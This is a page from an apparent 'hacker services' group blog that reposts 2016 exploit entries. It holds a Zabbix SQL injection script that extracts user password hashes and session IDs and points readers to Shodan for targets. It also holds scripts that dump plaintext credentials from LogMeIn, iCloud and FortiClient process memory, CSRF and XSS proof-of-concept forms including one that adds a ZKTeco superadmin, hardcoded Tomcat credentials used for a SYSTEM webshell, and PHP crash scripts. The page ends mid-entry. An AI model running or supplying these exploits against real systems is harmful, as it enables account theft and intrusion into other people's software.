Jump to content

Hacker Technology

A group blog by Leader in Hacker Website - Providing Professional Ethical Hacking Services

  • Entries

    16114

  • Comments

    7952

  • Views

    863589863

Contributors to this blog

  • HireHackking 16114

About this blog

Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.

HireHackking 
# Exploit Title: 2.0 < Zabbix < 3.0.4 SQL Injection Python PoC
# Data: 20-08-2016
# Software Link: www.zabbix.com
# Exploit Author: Unknown(http://seclists.org/fulldisclosure/2016/Aug/82)
# Version: Zabbix 2.0-3.0.x(<3.0.4)

# PoC Author: Zzzians
# Contact: Zzzians@gmail.com
# Test on: Linux (Debian/CentOS/Ubuntu)

# -*- coding: utf_8 -*-
# Use Shodan or and enjoy :)
# Comb the intranet for zabbix and enjoy :)
import sys,os,re,urllib2
def Inject(url,sql,reg):
    payload = url + "jsrpc.php?sid=0bcd4ade648214dc&type=9&method=screen.get&timestamp=1471403798083&mode=2&screenid=&groupid=&hostid=0&pageFile=history.php&profileIdx=web.item.graph&profileIdx2=" + urllib2.quote(
        sql) + "&updateProfile=true&screenitemid=&period=3600&stime=20160817050632&resourcetype=17&itemids[23297]=23297&action=showlatest&filter=&filter_task=&mark_color=1"
    try:
        response = urllib2.urlopen(payload, timeout=20).read()
    except Exception, msg:
        print '\t\tOpps,an error occurs...',msg
    else:
        result_reg = re.compile(reg)
        results = result_reg.findall(response)
        print payload #Uncomment this to see details
        if results:
            return results[0]
def exploit(url,userid):
    passwd_sql = "(select 1 from (select count(*),concat((select(select concat(cast(concat(alias,0x7e,passwd,0x7e) as char),0x7e)) from zabbix.users LIMIT "+str(userid-1)+",1),floor(rand(0)*2))x from information_schema.tables group by x)a)"
    session_sql="(select 1 from (select count(*),concat((select(select concat(cast(concat(sessionid,0x7e,userid,0x7e,status) as char),0x7e)) from zabbix.sessions where status=0 and userid="+str(userid)+" LIMIT 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)"
    password = Inject(url,passwd_sql,r"Duplicate\s*entry\s*'(.+?)~~")
    if(password):
        print '[+]Username~Password : %s' % password
    else:
        print '[-]Get Password Failed'
    session_id = Inject(url,session_sql,r"Duplicate\s*entry\s*'(.+?)~")
    if(session_id):
        print "[+]Session_id:%s" % session_id
    else:
        print "[-]Get Session id Failed"
    print '\n'
        
def main():
    print '=' * 70
    print '\t    2.0.x?  <  Zabbix  <  3.0.4 SQL Inject Python Exploit Poc'
    print '\t\t    Author:Zzzians(Zzzians@gmail.com)'
    print '\t    Reference:http://seclists.org/fulldisclosure/2016/Aug/82'
    print '\t\t\t    Time:2016-08-20\n'
    urls = ["http://10.15.5.86"]
    ids = [1,2]
    for url in urls:
        if url[-1] != '/': url += '/'
        print '='*25 +  url + '='*25
        for userid in ids:
	        exploit(url,userid)
main()
HireHackking 
Jobberbase:			http://www.jobberbase.com/
Version:			2.0
By Ross Marks: 		http://www.rossmarks.co.uk

1) Local path disclosure - change any variable to an array and in most cases it will tell you the local path where the application is installed
	eg. http://example.com/api/api.php?action=getJobs&type[]=0&category=0&count=5&random=1&days_behind=7&response=js
	returns: Array to string conversion in <b>/var/www/jobberbase/_lib/class.Job.php</b>

2) Open redirect - when submitting an application can change "Referer:" header to anything and will redirect there

3) reflect XSS in username - http://example.com/admin/
		eg. "><script>alert(1)</script>
	reflect XSS in search: http://example.com/search/|<img src="x" onError="alert(1)">/

4) persistant XSS on admin backend homepage
		create a job and give the URL:
		" onhover="alert(1)
	persistant XSS - admin add to category name (no protection)

5) unrestricted file upload
	upload CV accepts any filetype appends _ uniqueid() to filename
	eg. "file.php" becomes "file_<uniqueid>.php"
	uniquid in in insecure method for generating random sequences and is based on microtime
	if the server is using an older version of PHP a null byte can be used 
	ie. "test.php%00.php" would be uploaded as "test.php"

6) code execution race condition:
	if the admin has chosen to not store uploaded CV's 
	they are first moved from /tmp to the writable /upload directory before being unlinked
	this gives a brief window of opportunity for an attacker to run http://example.com/uploads/file.php before it is deleted

7) SQL injection in http://example.com/api/api.php?action=getJobs&type=0&category=0&count=5&random=1&days_behind=7&response=js
	days_behind parameter is vulnerable

** notes **

admin change password page don't need old password, no csrf token just a simple POST request.
admin password stored in md5 format unsalted
cookies do NOT have "secure" or "HTTPonly" flags enabled
no csrf anywhere
HireHackking 
#####
# LogMeIn Client v1.3.2462 (64bit) Local Credentials Disclosure
# Tested on Windows Windows Server 2012 R2 64bit, English
# Vendor Homepage @ https://secure.logmein.com/home/en
# Date 06/09/2016
# Bug Discovery by:
#
# Alexander Korznikov (https://www.linkedin.com/in/nopernik)
# http://korznikov.com/
#
# Viktor Minin (https://www.linkedin.com/in/MininViktor)
# https://1-33-7.com/
#
# Yakir Wizman (https://www.linkedin.com/in/yakirwizman)
# http://www.black-rose.ml
#
#####
# LogMeIn Client v1.3.2462 is vulnerable to local credentials disclosure, the supplied username and password are stored in a plaintext format in memory process.
# A potential attacker could reveal the supplied username and password in order to gain access to account and associated computers.
#####
# Proof-Of-Concept Code:

import time
import urllib
from winappdbg import Debug, Process

username	= ''
password	= ''
found		= 0
filename 	= "LMIIgnition.exe"
process_pid = 0
memory_dump	= []

debug = Debug()
try:
	print "[~] Searching for pid by process name '%s'.." % (filename)
	time.sleep(1)
	debug.system.scan_processes()
	for (process, process_name) in debug.system.find_processes_by_filename(filename):
		process_pid = process.get_pid()
	if process_pid is not 0:
		print "[+] Found process with pid #%d" % (process_pid)
		time.sleep(1)
		print "[~] Trying to read memory for pid #%d" % (process_pid)
		
		process = Process(process_pid)
		for address in process.search_bytes('\x26\x5F\x5F\x56\x49\x45\x57\x53\x54\x41\x54\x45\x3D'):
			memory_dump.append(process.read(address,150))
		for i in range(len(memory_dump[0])):
			email_addr 	= memory_dump[i].split('email=')[1]
			tmp_passwd 	= memory_dump[i].split('password=')[1]
			username	= email_addr.split('&hiddenEmail=')[0]
			password	= tmp_passwd.split('&rememberMe=')[0]
			if username != '' and password !='':
				found = 1
				print "[+] Credentials found!\r\n----------------------------------------"
				print "[+] Username: %s" % urllib.unquote_plus(username)
				print "[+] Password: %s" % password
				break
		if found == 0:
			print "[-] Credentials not found! Make sure the client is connected."
	else:
		print "[-] No process found with name '%s'." % (filename)
	
	debug.loop()
finally:
    debug.stop()
HireHackking 
#####
# Apple iCloud Desktop Client v5.2.1.0 Local Credentials Disclosure After Sign Out Exploit
# Tested on Windows Windows 7 64bit, English
# Vendor Homepage 	@ https://www.apple.com/
# Product Homepage 	@ https://support.apple.com/en-us/HT204283
# Date 07/09/2016
# Bug Discovery by:
#
# Yakir Wizman (https://www.linkedin.com/in/yakirwizman)
# http://www.black-rose.ml
#
# Viktor Minin (https://www.linkedin.com/in/MininViktor)
# https://1-33-7.com/
#
# Alexander Korznikov (https://www.linkedin.com/in/nopernik)
# http://korznikov.com/
#
#####
# Apple iCloud Desktop Client v5.2.1.0 is vulnerable to local credentials disclosure after the user is logged out.
# It seems that iCloud does not store the supplied credentials while the user is logged in, but after sign out the supplied username and password are stored in a plaintext format in memory process.
# Funny eh?!
# A potential attacker could reveal the supplied username and password in order to gain access to iCloud account.
#
# Authors are not responsible for any misuse or demage which caused by use of this script code.
# Please use responsibly.
#####
# Proof-Of-Concept Code:

import time
import urllib
from winappdbg import Debug, Process

def b2h(str):
    return ''.join(["%02X " % ord(x) for x in str]).strip()

def h2b(str):
	bytes = []
	str = ''.join(str.split(" "))
	for i in range(0, len(str), 2):
		bytes.append(chr(int(str[i:i+2], 16)))
	return ''.join(bytes)

usr			= ''
pwd			= ''
found		= 0
filename 	= "iCloud.exe"
process_pid = 0
memory_dump	= []

debug = Debug()
try:
	print "#########################################################################"
	print "#\tApple iCloud v5.2.1.0 Local Credentials Disclosure Exploit\t#"
	print "#   Bug Discovery by Yakir Wizman, Victor Minin, Alexander Korznikov\t#"
	print "#\t\tTested on Windows Windows 7 64bit, English\t\t#"
	print "#\t\t\tPlease use responsibly.\t\t\t\t#"
	print "#########################################################################\r\n"
	print "[~] Searching for pid by process name '%s'.." % (filename)
	time.sleep(1)
	debug.system.scan_processes()
	for (process, process_name) in debug.system.find_processes_by_filename(filename):
		process_pid = process.get_pid()
	if process_pid is not 0:
		print "[+] Found process with pid #%d" % (process_pid)
		time.sleep(1)
		print "[~] Trying to read memory for pid #%d" % (process_pid)
		
		process = Process(process_pid)
		for address in process.search_bytes('\x88\x38\xB7\xAE\x73\x8C\x07\x00\x0A\x16'):
			memory_dump.append(process.read(address,50))
		
		try:
			str = b2h(memory_dump[0]).split('88 38 B7 AE 73 8C 07 00 0A 16')[1]
			usr = h2b(str.split(' 00')[0])
		except:
			pass
			
		memory_dump	= []
		for address in process.search_bytes('\x65\x00\x88\x38\xB7\xAE\x73\x8C\x07\x00\x02\x09'):
			memory_dump.append(process.read(address,60))
		try:
			str = b2h(memory_dump[0]).split('07 00 02 09')[1]
			pwd = h2b(str.split(' 00')[0])
		except:
			pass
		
		if usr != '' and pwd !='':
			found = 1
			print "[+] iCloud Credentials found!\r\n----------------------------------------"
			print "[+] Username: %s" % usr
			print "[+] Password: %s" % pwd
		if found == 0:
			print "[-] Credentials not found!"
	else:
		print "[-] No process found with name '%s'." % (filename)
	
	debug.loop()
finally:
    debug.stop()
HireHackking 
'''
Title       : Extracting clear text passwords from running processes(FortiClient)
CVE-ID                  : none
Product                : FortiClient SSLVPN
Service                 : FortiTray.exe
Affected              : <=5.4
Impact                  : Critical
Remote                : No
Website link       : http://forticlient.com/
Reported             : 31/08/2016
Authors                : Viktor Minin                     https://1-33-7.com
                                  Alexander Korznikov    http://korznikov.com
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
In our research which involved this program we found that this process store the credentials that you supplied for connecting, in clear text in the process memory.
In this situation a potential attacker who hacked your system can reveal your Username and Password steal and use them.
This may assist him in gaining persistence access to your Organization LAN network.
'''

from winappdbg import Debug, Process, HexDump
import sys

filename = "FortiTray.exe"                          # Process name
search_string = "fortissl"                              # pattern to get offset when the credentials stored

# Searching function
def memory_search( pid, strings ):
                process = Process( pid )
                mem_dump = []
                                                                ######
                                                                # You could also use process.search_regexp to use regular expressions,
                                                                # or process.search_text for Unicode strings,
                                                                # or process.search_hexa for raw bytes represented in hex.
                                                                ######
                for address in process.search_bytes( strings ):
                                dump = process.read(address-10,800)                             #Dump 810 bytes from process memory
                                mem_dump.append(dump)
                                for i in mem_dump:
                                                if "FortiClient SSLVPN offline" in i:                       #print all founds results by offsets to the screen.
                                                                print "\n"
                                                                print " [+] Address and port to connect: " + str(i[136:180])
                                                                print " [+] UserName: " + str(i[677:685])
                                                                print " [+] Password: " + str(i[705:715])
                                                                print "\n"

debug = Debug()
try:
                # Lookup the currently running processes.
                debug.system.scan_processes()
                # Look for all processes that match the requested filename...
                for ( process, name ) in debug.system.find_processes_by_filename( filename ):
                                pid = process.get_pid()
                                memory_search(pid,search_string)
finally:
                debug.stop()
HireHackking 
<?php
#############################################################################
## PHP 7.0 JsonSerializable::jsonSerialize json_encode Local Denial of Service
## Tested on Windows Server 2012 R2 64bit, English, PHP 7.0
## Date: 31/08/2016
## Local Denial of Service
## Bug discovered by Yakir Wizman (https://www.linkedin.com/in/yakirwizman)
## http://www.black-rose.ml
#############################################################################
class jsonTmp implements JsonSerializable {
	function jsonSerialize() {
		$jsonTmp = new jsonTmp();
		return $jsonTmp;
	}
}
json_encode(new jsonTmp());
?>
HireHackking 
<!--

ZKTeco ZKAccess Security System 5.3.1 Stored XSS Vulnerability


Vendor: ZKTeco Inc. | Xiamen ZKTeco Biometric Identification Technology Co.,ltd
Product web page: http://www.zkteco.com
Affected version: 5.3.12252

Summary: ZKAccess Systems are built on flexible, open technology to provide
management, real-time monitoring, and control of your access control system-all
from a browser, with no additional software to install. Our secure Web-hosted
infrastructure and centralized online administration reduce your IT costs and
allow you to easily manage all of your access points in a single location. C3-100's
versatile design features take care of present and future needs with ease and
efficiency. It is one of the most rugged and reliable controllers on the market,
with a multitude of built-in features. The C3-100 can communicate at 38.4 Kbps
via RS-485 configuration or Ethernet TCP/IP networks. It can store up to 30,000
cardholders.

Desc: Input passed to the 'holiday_name' and 'memo' POST parameters is not properly
sanitised before being returned to the user. This can be exploited to execute
arbitrary HTML and script code in a user's browser session in context of an affected
site.

Tested on: CherryPy/3.1.0beta3 WSGI Server
           Firmware: AC Ver 4.1.9 3893-07 Jan 6 2016
           Python 2.6


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2016-5368
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5368.php


18.07.2016

-->


<html>
  <body>
    <form action="http://127.0.0.1/data/iaccess/AccHolidays/_new_/?_lock=1" method="POST">
      <input type="hidden" name="pk" value="None" />
      <input type="hidden" name="holiday&#95;name" value=""><script>alert&#40;1&#41;<&#47;script>" />
      <input type="hidden" name="holiday&#95;type" value="1" />
      <input type="hidden" name="start&#95;date" value="09&#47;13&#47;2016" />
      <input type="hidden" name="end&#95;date" value="10&#47;18&#47;2016" />
      <input type="hidden" name="loop&#95;by&#95;year" value="2" />
      <input type="hidden" name="memo" value=""><script>alert&#40;2&#41;<&#47;script>" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
HireHackking 

ZKTeco ZKBioSecurity 3.0 File Path Manipulation Vulnerability


Vendor: ZKTeco Inc. | Xiamen ZKTeco Biometric Identification Technology Co.,ltd
Product web page: http://www.zkteco.com
Affected version: 3.0.1.0_R_230
                  Platform: 3.0.1.0_R_230
                  Personnel: 1.0.1.0_R_1916
                  Access: 6.0.1.0_R_1757
                  Elevator: 2.0.1.0_R_777
                  Visitor: 2.0.1.0_R_877
                  Video:2.0.1.0_R_489
                  Adms: 1.0.1.0_R_197

Summary: ZKBioSecurity3.0 is the ultimate "All in One" web based security
platform developed by ZKTeco. It contains four integrated modules: access
control, video linkage, elevator control and visitor management. With an
optimized system architecture designed for high level biometric identification
and a modern-user friendly UI, ZKBioSecurity 3.0 provides the most advanced
solution for a whole new user experience.

Desc: File path manipulation vulnerabilities arise when user-controllable data
is placed into a file or URL path that is used on the server to access
local resources, which may be within or outside the web root. An attacker can
modify the file path to access different resources, which may contain sensitive
information. Even where an attack is constrained within the web root, it is often
possible to retrieve items that are normally protected from direct access, such
as application configuration files, the source code for server-executable scripts,
or files with extensions that the web server is not configured to serve directly.



Tested on: Microsoft Windows 7 Ultimate SP1 (EN)
           Microsoft Windows 7 Professional SP1 (EN)
           Apache-Coyote/1.1
           Apache Tomcat/7.0.56


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2016-5365
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5365.php


18.07.2016

--


http://127.0.0.1:8088/baseAction!getPageXML.action?xmlPath=/vid/../WEB-INF/web.xml
HireHackking 
<!--

ZKTeco ZKBioSecurity 3.0 CSRF Add Superadmin Exploit


Vendor: ZKTeco Inc. | Xiamen ZKTeco Biometric Identification Technology Co.,ltd
Product web page: http://www.zkteco.com
Affected version: 3.0.1.0_R_230
                  Platform: 3.0.1.0_R_230
                  Personnel: 1.0.1.0_R_1916
                  Access: 6.0.1.0_R_1757
                  Elevator: 2.0.1.0_R_777
                  Visitor: 2.0.1.0_R_877
                  Video:2.0.1.0_R_489
                  Adms: 1.0.1.0_R_197

Summary: ZKBioSecurity3.0 is the ultimate "All in One" web based security
platform developed by ZKTeco. It contains four integrated modules: access
control, video linkage, elevator control and visitor management. With an
optimized system architecture designed for high level biometric identification
and a modern-user friendly UI, ZKBioSecurity 3.0 provides the most advanced
solution for a whole new user experience.

Desc: The application interface allows users to perform certain actions via
HTTP requests without performing any validity checks to verify the requests.
This can be exploited to perform certain actions with administrative privileges
if a logged-in user visits a malicious web site.



Tested on: Microsoft Windows 7 Ultimate SP1 (EN)
           Microsoft Windows 7 Professional SP1 (EN)
           Apache-Coyote/1.1
           Apache Tomcat/7.0.56


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2016-5364
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5364.php


18.07.2016

-->


<html>
  <body>
    <form action="http://127.0.0.1:8088/authUserAction!edit.action" method="POST" enctype="multipart/form-data">
      <input type="hidden" name="authUser&#46;username" value="thricer" />
      <input type="hidden" name="authUser&#46;loginPwd" value="111111" />
      <input type="hidden" name="repassword" value="111111" />
      <input type="hidden" name="authUser&#46;isActive" value="true" />
      <input type="hidden" name="authUser&#46;isSuperuser" value="true" />
      <input type="hidden" name="groupIds" value="1" />
      <input type="hidden" name="deptIds" value="1" />
      <input type="hidden" name="areaIds" value="1" />
      <input type="hidden" name="authUser&#46;email" value="lab@zeroscience.mk" />
      <input type="hidden" name="authUser&#46;name" value="test" />
      <input type="hidden" name="authUser&#46;lastName" value="lasttest" />
      <input type="hidden" name="fingerTemplate" value="&#13;" />
      <input type="hidden" name="fingerId" value="&#13;" />
      <input type="hidden" name="logMethod" value="add" />
      <input type="hidden" name="un" value="1471451964349_2769" />
      <input type="hidden" name="systemCode" value="base" />
      <input type="submit" value="Go" />
    </form>
  </body>
</html>
HireHackking 
ZKTeco ZKBioSecurity 3.0 (visLogin.jsp) Local Authorization Bypass


Vendor: ZKTeco Inc. | Xiamen ZKTeco Biometric Identification Technology Co.,ltd
Product web page: http://www.zkteco.com
Affected version: 3.0.1.0_R_230
                  Platform: 3.0.1.0_R_230
                  Personnel: 1.0.1.0_R_1916
                  Access: 6.0.1.0_R_1757
                  Elevator: 2.0.1.0_R_777
                  Visitor: 2.0.1.0_R_877
                  Video:2.0.1.0_R_489
                  Adms: 1.0.1.0_R_197

Summary: ZKBioSecurity3.0 is the ultimate "All in One" web based security
platform developed by ZKTeco. It contains four integrated modules: access
control, video linkage, elevator control and visitor management. With an
optimized system architecture designed for high level biometric identification
and a modern-user friendly UI, ZKBioSecurity 3.0 provides the most advanced
solution for a whole new user experience.

Desc: The issue exist due to the way visLogin.jsp script processes the login
request via the 'EnvironmentUtil.getClientIp(request)' method. It runs a check
whether the request is coming from the local machine and sets the ip variable
to '127.0.0.1' if equal to 0:0:0:0:0:0:0:1. The ip variable is then used as a
username value with the password '123456' to authenticate and disclose sensitive
information and/or do unauthorized actions. 

Tested on: Microsoft Windows 7 Ultimate SP1 (EN)
           Microsoft Windows 7 Professional SP1 (EN)
           Apache-Coyote/1.1
           Apache Tomcat/7.0.56


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2016-5367
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5367.php


18.07.2016

--


C:\Program Files (x86)\BioSecurity\MainResource\tomcat\webapps\ROOT\visLogin.jsp:
---------------------------------------------------------------------------------

1:  <%@ page language="java" import="java.util.*" pageEncoding="UTF-8"%>
2:  <%@page import="com.zk.common.util.EnvironmentUtil"%>
3:  <%
4:  String path = request.getContextPath();
5:  String basePath = request.getScheme()+"://"+request.getServerName()+":"+request.getServerPort()+path+"/";
6:
7:  String ip= EnvironmentUtil.getClientIp(request);
8:  if("0:0:0:0:0:0:0:1".equals(ip))
9:  {
10:     ip = "127.0.0.1";
11: }
12:
13: %>
14: <jsp:include  page="login.jsp"/>
15:   <script type="text/javascript" src="/vis/js/jquery.cookie.js"></script>
16:
17:   <script>
18:       function autoLogin()
19:       {
20:                 $.cookie('backUrl', "visRegistrationAction!registrationTouch.action?type=touch", { expires: 1 });
21:                 $.cookie('customerBackUrl', "visRegistrationAction!registrationTouch.action?type=touch", { expires: 1 });
22:         var ip = "<%=ip%>";
23:         $("#userLoginForm input[name='username']").val(ip);
24:         $("#userLoginForm input[name='password']").val("123456");
25:         $('#userLoginForm').submit();
26:       }
27:       window.onload=autoLogin;
28: </script>

---------------------------------------------------------------------------------
HireHackking 
ZKTeco ZKBioSecurity 3.0 Hardcoded Credentials Remote SYSTEM Code Execution


Vendor: ZKTeco Inc. | Xiamen ZKTeco Biometric Identification Technology Co.,ltd
Product web page: http://www.zkteco.com
Affected version: 3.0.1.0_R_230
                  Platform: 3.0.1.0_R_230
                  Personnel: 1.0.1.0_R_1916
                  Access: 6.0.1.0_R_1757
                  Elevator: 2.0.1.0_R_777
                  Visitor: 2.0.1.0_R_877
                  Video:2.0.1.0_R_489
                  Adms: 1.0.1.0_R_197

Summary: ZKBioSecurity3.0 is the ultimate "All in One" web based security
platform developed by ZKTeco. It contains four integrated modules: access
control, video linkage, elevator control and visitor management. With an
optimized system architecture designed for high level biometric identification
and a modern-user friendly UI, ZKBioSecurity 3.0 provides the most advanced
solution for a whole new user experience.

Desc: The ZKBioSecurity solution suffers from a use of hard-coded credentials.
The application comes bundled with a pre-configured apache tomcat server and an
exposed 'manager' application that after authenticating with the credentials:
username: zkteco, password: zkt123, located in tomcat-users.xml file, it allows
malicious WAR archive containing a JSP application to be uploaded, thus giving
the attacker the ability to execute arbitrary code with SYSTEM privileges.

Ref: https://www.exploit-db.com/exploits/31433/


Tested on: Microsoft Windows 7 Ultimate SP1 (EN)
           Microsoft Windows 7 Professional SP1 (EN)
           Apache-Coyote/1.1
           Apache Tomcat/7.0.56


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2016-5362
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5362.php


18.07.2016

--


Contents of tomcat-users.xml:
-----------------------------

C:\Program Files (x86)\BioSecurity\MainResource\tomcat\conf\tomcat-users.xml:

<?xml version='1.0' encoding='utf-8'?>
...
...
...
<role rolename="manager-gui"/>  
<role rolename="manager-script"/>  
<role rolename="manager-jmx"/>  
<role rolename="manager-status"/>  
<user password="zkt123" roles="manager-gui,manager-script,manager-jmx,manager-status" username="zkteco"/>  
</tomcat-users>

-----------------------------


Open Manager application and login:
-----------------------------------

http://127.0.0.1:8088/manager (zkteco:zkt123)


Deploy JSP webshell, issue command:
-----------------------------------

- Request: whoami
- Response: nt authority\system


call the findConnectors() method of the Service use:
----------------------------------------------------

http://127.0.0.1:8088/manager/jmxproxy/?invoke=Catalina%3Atype%3DService&op=findConnectors&ps=

Response:

OK - Operation findConnectors returned:
  Connector[HTTP/1.1-8088]
  Connector[AJP/1.3-8019]


List of all loaded servlets:
----------------------------

http://127.0.0.1:8088/manager/jmxproxy/?j2eeType=Servlet
HireHackking 
ZKTeco ZKAccess Professional 3.5.3 Insecure File Permissions


Vendor: ZKTeco Inc. | Xiamen ZKTeco Biometric Identification Technology Co.,ltd
Product web page: http://www.zkteco.com
Affected version: 3.5.3 (Build 0005)

Summary: ZKAccess 3.5 is a desktop software which is suitable
for small and medium businesses application. Compatible with
all ZKAccess standalone reader controllers, the software can
simultaneously manage access control and generate attendance
report. The brand new flat GUI design and humanized structure
of new ZKAccess 3.5 will make your daily management more pleasant
and convenient.

Desc: ZKAccess suffers from an elevation of privileges vulnerability
which can be used by a simple authenticated user that can change the
executable file with a binary of choice. The vulnerability exist due
to the improper permissions, with the 'M' flag (Modify) for 'Authenticated Users'
group.


Tested on: Microsoft Windows 7 Ultimate SP1 (EN)
           Microsoft Windows 7 Professional SP1 (EN)


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2016-5361
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5361.php


18.07.2016

--


C:\ZKTeco>icacls ZKAccess3.5
ZKAccess3.5 BUILTIN\Administrators:(I)(F)
            BUILTIN\Administrators:(I)(OI)(CI)(IO)(F)
            NT AUTHORITY\SYSTEM:(I)(F)
            NT AUTHORITY\SYSTEM:(I)(OI)(CI)(IO)(F)
            BUILTIN\Users:(I)(OI)(CI)(RX)
            NT AUTHORITY\Authenticated Users:(I)(M)
            NT AUTHORITY\Authenticated Users:(I)(OI)(CI)(IO)(M)

Successfully processed 1 files; Failed processing 0 files
HireHackking 
<?php
#############################################################################
## PHP 7.0 AppendIterator::append Local Denial of Service
## Tested on Windows Server 2012 R2 64bit, English, PHP 7.0
## Date: 31/08/2016
## Local Denial of Service
## Bug discovered by Yakir Wizman (https://www.linkedin.com/in/yakirwizman)
## http://www.black-rose.ml
#############################################################################
$tmp = new AppendIterator();
$tmp->append($tmp); // Crash
?>
HireHackking 
ZKTeco ZKTime.Net 3.0.1.6 Insecure File Permissions


Vendor: ZKTeco Inc. | Xiamen ZKTeco Biometric Identification Technology Co.,ltd
Product web page: http://www.zkteco.com
Affected version: 3.0.1.6
                  3.0.1.5 (160622)
                  3.0.1.1 (160216)

Summary: ZKTime.Net V3.0 is a new generation time attendance
management software. Meanwhile, it integrates with time attendance
and access control system. Some frequently used functions such as
attendance reports, device management and employee management can
be managed directly on the home page which providing excellent user
experience. Owing to the Pay code function, it can generate both
time attendance records and corresponding payroll in the software
and easy to merge with the most ERP and Payroll software, which can
rapidly upgrade your working efficiency. The brand new flat GUI design
and humanized structure will make your daily management more pleasant
and convenient.

Desc: ZKTime.Net suffers from an elevation of privileges vulnerability
which can be used by a simple user that can change the executable file
with a binary of choice. The vulnerability exist due to the improper
permissions, with the 'C' flag (Change) for 'Everyone' group, making the
entire directory 'ZKTimeNet3.0' and its files and sub-dirs world-writable.

Tested on: Microsoft Windows 7 Ultimate SP1 (EN)
           Microsoft Windows 7 Professional SP1 (EN)


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2016-5360
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5360.php


18.07.2016

--


C:\>showacls "c:\Program Files (x86)\ZKTimeNet3.0"
c:\Program Files (x86)\ZKTimeNet3.0
                Everyone                  Change [RWXD]
                NT SERVICE\TrustedInstaller Special Access [A]
                NT AUTHORITY\SYSTEM       Special Access [A]
                BUILTIN\Administrators    Special Access [A]
                BUILTIN\Users             Special Access [RX]
                CREATOR OWNER             Special Access [A]


C:\>showacls "c:\Program Files (x86)\ZKTimeNet3.0\ZKTimeNet.exe"
c:\Program Files (x86)\ZKTimeNet3.0\ZKTimeNet.exe
                Everyone                  Change [RWXD]



C:\Program Files (x86)>cacls ZKTimeNet3.0
C:\Program Files (x86)\ZKTimeNet3.0 Everyone:(OI)(CI)C
                                    NT SERVICE\TrustedInstaller:(ID)F
                                    NT SERVICE\TrustedInstaller:(CI)(IO)(ID)F
                                    NT AUTHORITY\SYSTEM:(ID)F
                                    NT AUTHORITY\SYSTEM:(OI)(CI)(IO)(ID)F
                                    BUILTIN\Administrators:(ID)F
                                    BUILTIN\Administrators:(OI)(CI)(IO)(ID)F
                                    BUILTIN\Users:(ID)R
                                    BUILTIN\Users:(OI)(CI)(IO)(ID)(special access:)
                                                                  GENERIC_READ
                                                                  GENERIC_EXECUTE

                                    CREATOR OWNER:(OI)(CI)(IO)(ID)F


C:\Program Files (x86)\ZKTimeNet3.0>cacls *.exe
C:\Program Files (x86)\ZKTimeNet3.0\LanguageTranslate.exe Everyone:C
                                                          Everyone:(ID)C
                                                          NT AUTHORITY\SYSTEM:(ID)F
                                                          BUILTIN\Administrators:(ID)F
                                                          BUILTIN\Users:(ID)R

C:\Program Files (x86)\ZKTimeNet3.0\unins000.exe Everyone:(ID)C
                                                 NT AUTHORITY\SYSTEM:(ID)F
                                                 BUILTIN\Administrators:(ID)F
                                                 BUILTIN\Users:(ID)R

C:\Program Files (x86)\ZKTimeNet3.0\ZKTimeNet.DBTT.exe Everyone:C
                                                       Everyone:(ID)C
                                                       NT AUTHORITY\SYSTEM:(ID)F
                                                       BUILTIN\Administrators:(ID)F
                                                       BUILTIN\Users:(ID)R

C:\Program Files (x86)\ZKTimeNet3.0\ZKTimeNet.exe Everyone:C
                                                  Everyone:(ID)C
                                                  NT AUTHORITY\SYSTEM:(ID)F
                                                  BUILTIN\Administrators:(ID)F
                                                  BUILTIN\Users:(ID)R

C:\Program Files (x86)\ZKTimeNet3.0\ZKTimeNet.Update.exe Everyone:C
                                                         Everyone:(ID)C
                                                         NT AUTHORITY\SYSTEM:(ID)F
                                                         BUILTIN\Administrators:(ID)F
                                                         BUILTIN\Users:(ID)R

C:\Program Files (x86)\ZKTimeNet3.0\ZKTimeNet.ZKTime5DB.exe Everyone:C
                                                            Everyone:(ID)C
                                                            NT AUTHORITY\SYSTEM:(ID)F
                                                            BUILTIN\Administrators:(ID)F
                                                            BUILTIN\Users:(ID)R
HireHackking 
<?php
#############################################################################
## PHP 5.0.0 snmpset() Local Denial of Service
## Tested on Windows Server 2012 R2 64bit, English, PHP 5.0.0
## Download @ http://museum.php.net/php5/php-5.0.0-Win32.zip
## Date: 26/08/2016
## Local Denial of Service
## Bug discovered by Yakir Wizman (https://www.linkedin.com/in/yakirwizman)
## http://www.black-rose.ml
#############################################################################
if (!extension_loaded("snmp")) die("You need snmp extension loaded!");

$str = str_repeat('A', 9999);
snmpset("localhost", 'public', $str, '', '');
?>
HireHackking 
<?php
#############################################################################
## PHP 5.0.0 snmprealwalk() Local Denial of Service
## Tested on Windows Server 2012 R2 64bit, English, PHP 5.0.0
## Download @ http://museum.php.net/php5/php-5.0.0-Win32.zip
## Date: 26/08/2016
## Local Denial of Service
## Bug discovered by Yakir Wizman (https://www.linkedin.com/in/yakirwizman)
## http://www.black-rose.ml
#############################################################################
if (!extension_loaded("snmp")) die("You need snmp extension loaded!");

$str = str_repeat('A', 9999);
snmprealwalk('127.0.0.1', 'public', $str);
?>
HireHackking 
<?php
#############################################################################
## PHP 5.0.0 snmpwalk() Local Denial of Service
